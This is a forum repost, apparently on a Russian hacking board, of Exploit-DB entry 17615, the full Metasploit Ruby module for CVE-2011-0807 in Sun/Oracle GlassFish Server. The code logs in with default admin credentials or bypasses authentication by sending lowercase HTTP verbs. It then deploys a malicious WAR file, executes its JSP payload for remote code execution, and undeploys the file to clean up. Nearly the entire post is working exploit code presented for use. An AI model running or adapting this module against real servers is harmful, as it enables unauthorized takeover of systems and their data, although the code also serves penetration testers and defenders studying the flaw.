Exploit Sun/Oracle GlassFish Server - (Authenticated) Code Execution (Metasploit)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
17615
Проверка EDB
  1. Пройдено
Автор
METASPLOIT
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
cve-2011-0807
Дата публикации
2011-08-05
Код:
##
# $Id: glassfish_deployer.rb 13485 2011-08-04 17:36:01Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Sun/Oracle GlassFish Server Authenticated Code Execution",
			'Description'    => %q{
					This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) 
				instance using a default credential, uploads, and executes commands via deploying
				a malicious WAR.  On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x
				this module will try to bypass authentication instead by sending lowercase HTTP verbs.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision: 13485 $",
			'Author'         =>
				[
					#Msf module for Glassfish 3.0
					'juan vazquez',
					#Msf module for Glassfish 3.1, 2.x and Sun Java System Application Server 9.1
					'Joshua Abraham <jabra[at]rapid7.com>',
					#Rewrite for 3.0, 3.1 (Commercial or Open Source)
					'sinn3r',
				],
			'References'     =>
				[
					['CVE', '2011-0807'],
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[
						'Java Universal',
						{
							'Arch'     => ARCH_JAVA,
							'Platform' => 'java',
						},
					],
					#
					# platform specific targets only
					#
					[
						'Windows Universal',
						{
							'Arch'     => ARCH_X86,
							'Platform' => 'win',
						},
					],
					#
					# platform specific targets only
					#
					[
						'Linux Universal',
						{
							'Arch'     => ARCH_X86,
							'Platform' => 'linux',
						},
					],
				],
			'DisclosureDate' => "Aug 4 2011",
			'DefaultTarget'  => 0))

			register_options(
				[
					Opt::RPORT(4848),
					OptString.new('APP_RPORT',[ true,  'The Application interface port', '8080']),
					OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
					OptString.new('PASSWORD', [ false, 'The password for the specified username','' ]),
					OptString.new('PATH', [ true,  "The URI path of the GlassFish Server", '/'])
				], self.class)
	end

	#
	# Send GET or POST request, and return the response
	#
	def send_request(path, method, session='', data=nil, ctype=nil)

		headers = {}
		headers['Cookie'] = "JSESSIONID=#{session}" if session != ''
		headers['Content-Type'] = ctype if ctype != nil
		headers['Content-Length'] = data.length if data != nil

		res = send_request_raw({
			'uri'     => path,
			'method'  => method,
			'data'    => data,
			'headers' => headers,
		}, 90)

		#'vhost' => "#{datastore['rhost']}:#{datastore['rport']}"
		return res
	end

	#
	# Return target
	#
	def auto_target(session, res, version)
		print_status("Attempting to automatically select a target...")

		res = query_serverinfo(session,version)
		return nil if not res
		return nil if not res.body

		plat = detect_platform(res.body)
		arch = detect_arch(res.body)
		
		# No arch or platform found?
		return nil if (not arch or not plat)

		# see if we have a match
		targets.each do |t|
			return t if (t['Platform'] == plat) and (t['Arch'] == arch)
		end

		# no matching target found
		return nil
	end

	#
	# Return platform (win, linux, or osx)
	#
	def detect_platform(body)
		body.each_line do |ln|
			ln.chomp!
			case ln
			when /os\.name = (.*)/
				os = $1
				case os
				when /Windows/
					return 'win'
				when /Linux/
					return 'linux'
				when /Mac OS X/
					return 'osx'
				end
			end
		end

		return 'java'
	end

	#
	# Return ARCH
	#
	def detect_arch(body)
		body.each_line do |ln|
			ln.chomp!
			case ln
			when /os\.arch = (.*)/
				ar = $1
				case ar
				when 'x86', 'i386', 'i686'
					return ARCH_X86
				when 'x86_64', 'amd64'
					return ARCH_X86
				end
			end
		end
	end

	#
	# Return server information
	#
	def query_serverinfo(session,version)
		res = ''

		if version == '2.x' or version == '9.x'
			path = "/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report"
			res = send_request(path, @verbs['GET'], session)
		else
			path = "/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report"
			res = send_request(path, @verbs['GET'], session)

			if ((not res) or (res.code != 200) or (res.body !~ /Operating System Information/))
				path = "/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server"
				res = send_request(path, @verbs['GET'], session)
			end
		end

		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end

		return res
	end

	#
	# Return viewstate and entry before deleting a GlassFish application
	#
	def get_delete_info(session, version, app='')
		if version == '2.x' or version == '9.x'
			path = '/applications/webApplications.jsf'
			res = send_request(path, @verbs['GET'], session)

			if (not res) or (res.code != 200)
				print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
				return nil
			end

			input_id = "javax.faces.ViewState"
			p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(j_id\d+:j_id\d+)"/
			viewstate = res.body.scan(p)[0][0]

			entry = nil
			p = /<a id="(.*)col1:link" href="\/applications\/webApplicationsEdit.jsf.*appName=(.*)">/
			results = res.body.scan(p)

			results.each do |hit|
				if hit[1] =~ /^#{app}/
					entry = hit[0]
					entry << "col0:select"
				end
			end

		else
			path = '/common/applications/applications.jsf?bare=true'
			res = send_request(path, @verbs['GET'], session)

			if (not res) or (res.code != 200)
				print_error("Failed (#{res.code.to_s}): Error requesting #{path}")
				return nil
			end

			input_id = "javax.faces.ViewState"
			p = /input type="hidden" name="#{input_id}" id="#{input_id}" value="(.*)" autocomplete="off"/
			viewstate = res.body.scan(p)[0][0]

			entry = nil
			p = /<a id="(.*)col1:link" href="\/common\/applications\/applicationEdit.jsf.*appName=(.*)">/
			results = res.body.scan(p)

			results.each do |hit|
				if hit[1] =~ /^#{app}/
					entry = hit[0]
					entry << "col0:select"
				end
			end
		end

		if (viewstate.nil?)
			print_error("Failed: Error getting ViewState")
			return nil
		elsif (entry.nil?)
			print_error("Failed: Error getting the entry to delete")
		end

		return viewstate, entry
	end

	#
	# Send an "undeploy" request to Glassfish and remove our backdoor
	#
	def undeploy(viewstate, session, entry)
		#Send undeployment request
		data  = [
		"propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_list=",
		"&propertyForm%3AdeployTable%3AtopActionsGroup1%3Afilter_submitter=false",
		"&#{Rex::Text.uri_encode(entry)}=true",
		"&propertyForm%3AhelpKey=ref-applications.html",
		"&propertyForm_hidden=propertyForm_hidden",
		"&javax.faces.ViewState=#{Rex::Text.uri_encode(viewstate)}",
		"&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
		"&javax.faces.source=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
		"&javax.faces.partial.execute=%40all",
		"&javax.faces.partial.render=%40all",
		"&bare=true",
		"&propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1=propertyForm%3AdeployTable%3AtopActionsGroup1%3Abutton1",
		"&javax.faces.partial.ajax=true"
		].join()

		path  = '/common/applications/applications.jsf'
		ctype = 'application/x-www-form-urlencoded'

		res   = send_request(path, @verbs['POST'], session, data, ctype)
		if (not res)
			print_error("Undeployment failed on #{path} - No Response")
	 	else
			if res.code < 200 or res.code >= 300
				print_error("Undeployment failed on #{path} - #{res.code.to_s}:#{res.message.to_s}")
			end
		end
	end

	#
	# Return GlassFish's edition (Open Source or Commercial) and version (2.x, 3.0, 3.1, 9.x) and
	# banner (ex: Sun Java System Application Server 9.x)
	#
	def get_version(res)
		#Extract banner from response
		banner = res.headers['Server']

		#Default value for edition and glassfish version
		edition = 'Commercial'
		version = 'Unknown'

		#Set edition (Open Source or Commercial)
		p = /(Open Source|Sun GlassFish Enterprise Server|Sun Java System Application Server)/
		edition = 'Open Source' if banner =~ p

		#Set version.  Some GlassFish servers return banner "GlassFish v3".
		if banner =~ /(GlassFish Server|Open Source Edition) (\d\.\d)/
			version = $2
		elsif banner =~ /GlassFish v(\d)/ and (version == 'Unknown' or version.nil?)
			version = $1
		elsif banner =~ /Sun GlassFish Enterprise Server v2/ and (version.nil? or version == 'Unknown')
			version = '2.x'
		elsif banner =~ /Sun Java System Application Server 9/ and (version.nil? or version == 'Unknown')
			version = '9.x'
		end

		if version == nil or version == 'Unknown'
			print_status("Unsupported version: #{banner}")
		end

		return edition, version, banner
	end

	#
    # Return the formatted version of the POST data
    #
    def format_2_x_war(boundary,name,value=nil, war=nil)
        data = ''

		data << boundary
		data << "\r\nContent-Disposition: form-data; name=\"form:title:sheet1:section1:prop1:fileupload\"; "
		data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
		data << war
		data << "\r\n"

        return data
    end

	#
	# Return the formatted version of the POST data
	#
	def format(boundary,name,value=nil, war=nil)
		data = ''

		if war
			data << boundary
			data << "\r\nContent-Disposition: form-data; name=\"form:sheet1:section1:prop1:fileupload\"; "
			data << "filename=\"#{name}.war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
			data << war
			data << "\r\n"
		else
			data << boundary
			data << "\r\nContent-Disposition: form-data; name=\"#{name}\""
			data << "\r\n\r\n"
			data << "#{value}\r\n"
		end

		return data
	end

	#
	# Return POST data and data length, based on GlassFish edition
	#
	def get_upload_data(boundary, version, war, app_base, typefield='', status_checkbox='', start='', viewstate='')
		data = ''

		if version == '3.0'

			uploadParam_name = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
			uploadparam_data = "form:sheet1:section1:prop1:fileupload"

			boundary = "--#{boundary}"

			data = [
				format(boundary, app_base, nil, war),
				format(boundary, uploadParam_name, uploadparam_data),
				format(boundary, "form:sheet1:section1:prop1:extension", ".war"),
				format(boundary, "form:sheet1:section1:prop1:action", "client"),
				format(boundary, typefield, "war"),
				format(boundary, "form:war:psection:cxp:ctx", app_base),
				format(boundary, "form:war:psection:nameProp:appName", app_base),
				format(boundary, "form:war:psection:vsProp:vs", ""),
				format(boundary, status_checkbox, "true"),
				format(boundary, "form:war:psection:librariesProp:library", ""),
				format(boundary, "form:war:psection:descriptionProp:description", ""),
				format(boundary, "form_hidden", "form_hidden"),
				format(boundary, "javax.faces.ViewState", viewstate),
				"#{boundary}--"
			].join()
		elsif version == '2.x' or version == '9.x'

			uploadParam_name = "form:title:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
			uploadParam_data = "form:title:sheet1:section1:prop1:fileupload"

			focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
			focusElementId_data = 'form:title:topButtons:uploadButton'

			boundary = "-----------------------------#{boundary}"

			data = [
				format_2_x_war(boundary, app_base, nil, war),
				format(boundary, "form:title:sheet1:section1:type:appType", "webApp"),
				format(boundary, "uploadRdBtn", "client"),
				format(boundary, uploadParam_name, uploadParam_data),
				format(boundary, "form:title:sheet1:section1:prop1:extension", ".war"),
				format(boundary, "form:title:ps:psec:nameProp:appName", app_base),
				format(boundary, "form:title:ps:psec:cxp:ctx", app_base),
				format(boundary, "form:title:ps:psec:vsp:vs", ""),
				format(boundary, status_checkbox, "true"),
				format(boundary, "form:title:ps:psec:librariesProp:library", ""),
				format(boundary, "form:title:ps:psec:threadpoolProp:threadPool", ""),
				format(boundary, "form:title:ps:psec:registryProp:registryType", ""),
				format(boundary, "form:title:ps:psec:descriptionProp:description", ""),
				format(boundary, "form:helpKey", "uploaddev.html"),
				format(boundary, "form_hidden", "form_hidden"),
				format(boundary, "javax.faces.ViewState", viewstate),
				format(boundary, focusElementId_name, focusElementId_data),
				"#{boundary}--"
			].join()
		else

			boundary = "-----------------------------#{boundary}"

			#Setup dynamic arguments
			num1 = start.to_i
			num2 = num1 + 14
			num3 = num2 + 2
			num4 = num3 + 2
			num5 = num4 + 2
			num6 = num5 + 2
			num7 = num6 + 1

			id0 = num4
			id1 = num4 + 1
			id2 = num4 + 2
			id3 = num4 + 3
			id4 = num4 + 4
			id5 = num4 + 5
			id6 = num4 + 6
			id7 = num4 + 7
			id8 = num4 + 8
			id9 = num4 + 9

			uploadParam_name  = "form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
			uploadParam_value = "form:sheet1:section1:prop1:fileupload"

			focusElementId_name = "com_sun_webui_util_FocusManager_focusElementId"
			focusElementId_data = "form:title2:bottomButtons:uploadButton"

			data = [
				format(boundary,"uploadRdBtn","client"),
				## web service
				format(boundary, app_base, nil, war),
				## sheet1
				format(boundary, uploadParam_name, uploadParam_value),
				format(boundary,"form:sheet1:section1:prop1:extension",".war"),
				format(boundary,"form:sheet1:section1:prop1:action","client"),
				format(boundary,"form:sheet1:sun_propertySheetSection#{num1.to_s}:type:appType","war"),
				format(boundary,"form:appClient:psection:nameProp:appName","#{app_base}"),
				format(boundary,"form:appClient:psection:descriptionProp:description"),
				## war
				format(boundary,"form:war:psection:cxp:ctx","#{app_base}"),
				format(boundary,"form:war:psection:nameProp:appName","#{app_base}"),
				format(boundary,"form:war:psection:vsProp:vs"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id1.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id2.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id3.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id4.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id5.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id6.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id7.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id8.to_s,"true"),
				format(boundary,"form:war:psection:enableProp:sun_checkbox" + id9.to_s,"true"),
				format(boundary,"form:war:psection:librariesProp:library"),
				format(boundary,"form:war:psection:descriptionProp:description"),
				format(boundary,"form_hidden","form_hidden"),
				format(boundary,"javax.faces.ViewState","#{viewstate}"),
				format(boundary, focusElementId_name, focusElementId_data)
			].join()

			item_list_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"
			item_list_data = "|server|com.sun.webui.jsf.separator|"

			item_value_name = "form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"
			item_value_data = "server"

			data << format(boundary, item_list_name, item_list_data)
			data << format(boundary, item_value_name, item_value_data)
			data << "#{boundary}--"
			data << "\r\n\r\n"

		end

		return data
	end

	#
	# Upload our payload, and execute it.  This function will also try to automatically
	# clean up after itself.
	#
	def upload_exec(session, app_base, jsp_name, target, war, edition, version)
		if version == '2.x' or version == '9.x'
			path = "/applications/upload.jsf?appType=webApp"
			res = send_request(path, @verbs['GET'], session)

			#Obtain some properties
			begin
				p1 = /id="javax\.faces\.ViewState" value="(j_id\d{1,5}:j_id\d{1,5})"/mi
				p2 = /input type="checkbox" id="form:title:ps:psec:enableProp:sun_checkbox\d+" name="(.*)" checked/mi
				viewstate       = res.body.scan(p1)[0][0]
				status_checkbox = res.body.scan(p2)[0][0]
				boundary        = rand_text_alphanumeric(28)
			rescue
				print_error("Unable to gather required data for file upload")
				return
			end
		else
			path = "/common/applications/uploadFrame.jsf"
			res = send_request(path, @verbs['GET'], session)

			#Obtain some properties
			begin
				#start is only for dynamic arguments in POST data
				res.body =~ /propertySheetSection(\d{3})/
				start = $1
				p1 = /"javax\.faces\.ViewState" value="(-?\d+:-?\d+)"/mi
				p2 = /select class="MnuStd_sun4" id="form:sheet1:sun_propertySheetSection.*:type:appType" name="(.*)" size/
				p3 = /input type="checkbox" id="form:war:psection:enableProp:sun_checkbox.*" name="(.*)" checked/

				rnd_text = rand_text_alphanumeric(29)

				viewstate       = res.body.scan(p1)[0][0]
				typefield       = res.body.scan(p2)[0][0]
				status_checkbox = res.body.scan(p3)[0][0]
				boundary        = (edition == 'Open Source') ? rnd_text[0,15] : rnd_text
			rescue
				print_error("Unable to gather required data for file upload")
				return
			end
		end

		#Get upload data
		if version == '3.0'
			ctype = "multipart/form-data; boundary=#{boundary}"
		elsif version == '2.x' or version == '9.x'
			ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
            typefield = ''
            start = ''
		else
			ctype = "multipart/form-data; boundary=---------------------------#{boundary}"
		end

		post_data = get_upload_data(boundary, version, war, app_base, typefield, status_checkbox, start, viewstate)

		#Upload our payload
		if version == '2.x' or version == '9.x'
			path = '/applications/upload.jsf?form:title:topButtons:uploadButton=%20%20OK%20%20'
		else
			path  = '/common/applications/uploadFrame.jsf?'
			path << 'form:title:topButtons:uploadButton=Processing...'
			path << '&bare=false'
		end
		res  = send_request(path, @verbs['POST'], session, post_data, ctype)

		#Print upload result
		if res and res.code == 302
			print_status("Successfully uploaded")
		else
			print_error("Error uploading #{res.code}")
			return
		end

		#Execute our payload using the application interface (no need to use auth bypass technique)
		jsp_path = "/" + app_base + "/" + jsp_name + ".jsp"
		nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['APP_RPORT'],
			{
				'Msf'        => framework,
				'MsfExploit' => self,
			}
		)

		print_status("Executing #{jsp_path}...")
		req = nclient.request_raw({
			'uri'     => jsp_path,
			'method'  => 'GET',
		})

		if (req)
			res = nclient.send_recv(req, 90)
		else
			print_status("Error: #{rhost} did not respond on #{app_rport}.")
		end

		#Sleep for a bit before cleanup
		select(nil, nil, nil, 5)

		#Start undeploying
		print_status("Getting information to undeploy...")
		viewstate, entry = get_delete_info(session, version, app_base)
		if (not viewstate)
			raise RuntimeError, "Unable to get viewstate"
		elsif (not entry)
			raise RuntimeError, "Unable to get entry"
		end

		print_status("Undeploying #{app_base}...")
		undeploy(viewstate, session, entry)

		print_status("Undeployment complete.")
	end

	#
	# Try to login to Glassfish with a credential, and return the response
	#
	def try_login(user, pass)
		data  = "j_username=#{Rex::Text.uri_encode(user.to_s)}&"
		data << "j_password=#{Rex::Text.uri_encode(pass.to_s)}&"
		data << "loginButton=Login"

		path = '/j_security_check'
		res = send_request(path, @verbs['POST'], '', data, 'application/x-www-form-urlencoded')

		return res
	end

	def log_success(user,pass)
		print_good("#{target_host()} - GlassFish - SUCCESSFUL login for '#{user}' : '#{pass}'")
		report_auth_info(
			:host   => rhost,
			:port   => rport,
			:sname  => 'http',
			:user   => user,
			:pass   => pass,
			:proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
			:active => true
		)
	end

	def try_default_glassfish_login(version)
		success = false
		session = ''
		res = ''
		if version == '2.x' or version == '9.x'
			user = 'admin'
			pass = 'adminadmin'

			print_status("Trying default credential GlassFish 2.x #{user}:'#{pass}'....")
			res = try_login(user,pass)
			if res and res.code == 302
				session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
				res = send_request('/applications/upload.jsf', 'GET', session)

				p = /<title>Deploy Enterprise Applications\/Modules/
				if (res and res.code.to_i == 200 and res.body.match(p) != nil)
					success = true
				end
			end

		else
			user = 'admin'
			pass = ''

			print_status("Trying default credential GlassFish 3.x #{user}:'#{pass}'....")
			res = try_login(user,pass)
			if res and res.code == 302
				session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
				res = send_request('/common/applications/uploadFrame.jsf', 'GET', session)

				p = /<title>Deploy Applications or Modules/
				if (res and res.code.to_i == 200 and res.body.match(p) != nil)
					success = true
				end
            end
		end

		if success == true
			log_success(user,pass)
		else
			msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
			print_error(msg)
		end

		return success, res, session
	end

	def try_nondefault_glassfish_login(version,user,pass)

		print_status("Trying credential #{user}:'#{pass}'....")
		success = false
		session = ''

		res = try_login(user, pass)
		if version == '2.x' or version == '9.x'
			if res and res.code == 302
				session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
				res = send_request('/applications/upload.jsf', 'GET', session)

				p = /<title>Deploy Enterprise Applications\/Modules/
				if (res and res.code.to_i == 200 and res.body.match(p) != nil)
					success = true
                end
            end
		else
			if res and res.code == 302
				session = $1 if (res and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /i)
				res = send_request('/common/index.jsf', 'GET', session)

				p = /<title>Deploy Applications or Modules/
				if (res and res.code.to_i == 200 and res.body.match(p) != nil)
					success = true
				end
			end
		end

		if success == true
			log_success(user,pass)
		else
			msg = "#{target_host()} - GlassFish - Failed to authenticate login for '#{user}' : '#{pass}'"
			print_error(msg)
		end

		return success, res, session
	end


	def try_glassfish_auth_bypass(version)
		print_status("Trying GlassFish authentication bypass..")
		success = false

		if version == '2.x' or version == '9.x'
			res = send_request('/applications/upload.jsf', 'get')
			p = /<title>Deploy Enterprise Applications\/Modules/
			if (res and res.code.to_i == 200 and res.body.match(p) != nil)
				success = true
			end
		else
			# 3.0
			res = send_request('/common/applications/uploadFrame.jsf', 'get')
			p = /<title>Deploy Applications or Modules/
			if (res and res.code.to_i == 200 and res.body.match(p) != nil)
				success = true
			end
		end

		if success == true
			print_good("#{target_host} - GlassFish - SUCCESSFUL authentication bypass")
			report_auth_info(
				:host   => rhost,
				:port   => rport,
				:sname  => 'http',
				:user   => '',
				:pass   => '',
				:proof  => "WEBAPP=\"GlassFish\", VHOST=#{vhost}",
				:active => true
			)
		else
			print_error("#{target_host()} - GlassFish - Failed authentication bypass")
		end

		return success
	end

	def target_host
		path        = datastore['PATH']
		target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
	end

	def exploit
		user        = datastore['USERNAME']
		pass        = datastore['PASSWORD']
		path        = datastore['PATH']
		target_host = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
		success     = false
		session     = ''
		edition     = ''
		version     = ''

		#Invoke index to gather some info
		res = send_request('/common/index.jsf', 'GET')

		if res.code == 302
			res = send_request('/login.jsf', 'GET')
		end

		#Get GlassFish version
		edition, version, banner = get_version(res)
		print_status("Glassfish edition: #{banner}")

		#Get session
		res.headers['Set-Cookie'] =~ /JSESSIONID=(.*); /
		session = $1

		#Set HTTP verbs.  lower-case is used to bypass auth on v3.0
		@verbs = {
			'GET'  => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
			'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
		}
		
		#auth bypass
		if version == '3.0' or version == '2.x' or version == '9.x'
			success = try_glassfish_auth_bypass(version)
		end

		#BUG caused us to skip default cred checks on sun applicaiton server 9.x 
		if success == false and version != '9.x'
			#default credentials
			success,res,session_login = try_default_glassfish_login(version)
			if success == false
				if (
					( (version == '2.x' ) and (user != 'admin' and pass != 'adminadmin') )  or 
					( (version =~ /^3\./) and (user != 'admin' and pass != '') )
				)
					#non-default login
					success,res,session_login = try_nondefault_glassfish_login(version,user,pass)
				end
			end
		end

		#Start attacking
		if success
			session = session_login if (session_login =~ /\w+/)
			#Set target
			mytarget = target
			mytarget = auto_target(session, res, version) if mytarget.name =~ /Automatic/
			raise RunTimeError, "Unable to automatically select a target" if (not mytarget)

			#Generate payload
			p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)

			jsp_name = rand_text_alphanumeric(4+rand(32-4))
			app_base = rand_text_alphanumeric(4+rand(32-4))

			war = p.encoded_war({
				:app_name    => app_base,
				:jsp_name    => jsp_name,
				:arch        => mytarget.arch,
				:platform    => mytarget.platform
			}).to_s

			#Upload, execute, cleanup, winning
			print_status("Uploading payload...")
			res = upload_exec(session, app_base, jsp_name, mytarget, war, edition, version)
		else
			print_error("#{target_host()} - GlassFish - Failed to authenticate login")
		end

	end
end
 
Источник
www.exploit-db.com

Похожие темы